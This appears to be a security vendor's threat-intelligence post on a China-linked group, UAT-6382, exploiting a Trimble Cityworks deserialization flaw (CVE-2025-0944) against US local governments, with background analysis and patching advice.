China-linked threat actor breaches government networks with Trimble flaw

The Chinese-speaking cyber-espionage group identified as UAT-6382 has been observed exploiting a critical vulnerability in Trimble's Cityworks software to infiltrate U.S. government networks.

The flaw, designated CVE-2025-0944, involved the deserialization of untrusted data, allowing for remote code execution. Although the vulnerability has since been patched, it has been actively exploited by the group since at least January 2025, targeting enterprise networks of local governing bodies in the United States.

Upon gaining access, UAT-6382 conducted reconnaissance to identify and fingerprint servers, then deployed various web shells and custom-made malware to maintain long-term access. Notably, they delivered a Rust-based loader known as TetraLoader, which launched Cobalt Strike and a Go-based remote access tool named VShell. TetraLoader was built using MaLoader, a publicly available malware-building framework written in Simplified Chinese that first appeared on GitHub in December 2024.

Stay on top of emerging threats.

Sign up to receive a weekly roundup of our security intelligence feed. You'll be the first to know of emerging attack vectors, threats, and vulnerabilities. 

Sign up

UAT-6382 also utilized web shells like AntSword, Chopper, and Behinder, commonly associated with Chinese hacking groups, to facilitate its operations. They enumerated multiple directories on compromised servers to identify files of interest, staging them in directories where web shells were deployed for easy exfiltration. Additionally, multiple backdoors were downloaded and deployed via PowerShell to ensure persistent access.

In light of UAT-6382’s exploitation of CVE-2025-0944, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog in February 2025.

Source: Bleeping Computer

Analysis

Trimble Cityworks is an asset management platform widely used by municipalities, utilities, and public works agencies to manage infrastructure assets throughout their lifecycle. The platform provides tools for work order management, permitting, inspections, and maintenance operations, facilitating data-driven decision-making and efficient service delivery.

China has a history of targeting local governing bodies in the United States, particularly as part of broader cyber-espionage campaigns aimed at gathering strategic intelligence.

One notable example occurred in 2021, when Chinese state-sponsored hackers were linked to a campaign exploiting vulnerabilities in Microsoft Exchange Server. This operation—attributed to a group known as HAFNIUM—impacted a wide range of organizations, including municipal governments. The attackers exploited zero-day flaws to gain access to email systems, exfiltrate sensitive data, and establish persistent access through web shells.

Another example is the ongoing trend observed by U.S. federal agencies, where Chinese-linked threat actors have been found targeting state and local government systems as part of influence or surveillance operations. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has repeatedly warned that such groups seek to exploit vulnerabilities in smaller government entities, which often have fewer cybersecurity resources but maintain valuable data and infrastructure access.

These activities are consistent with China’s strategic goals of building a comprehensive intelligence picture across all levels of governance—not just federal agencies. By targeting local bodies, Chinese threat actors can collect data related to public infrastructure, law enforcement, political activities, and citizen demographics, all of which may support espionage, influence, or disruption operations.

This incident underscores the importance of promptly applying security patches and monitoring for signs of compromise, especially in software platforms integral to critical infrastructure management.

Mitigation

Field Effect’s Security Intelligence professionals constantly monitor the cyber threat landscape for emerging threats emanating from China-linked actors like UAT-6382. Field Effect MDR users are automatically notified if activity associated with these groups is detected in their environment and are encouraged to review these AROs as quickly as possible via the Field Effect Portal.

Field Effect strongly encourages users of the impacted Trimble Cityworks versions to update their software to the latest version as soon as possible.

Related Articles

• Critical vulnerabilities in Versa Concerto at risk of exploitation
• China-linked threat actor deploys backdoors, rootkits on Junos OS routers
• MSPs and ISPs breached with Versa Director zero-day vulnerability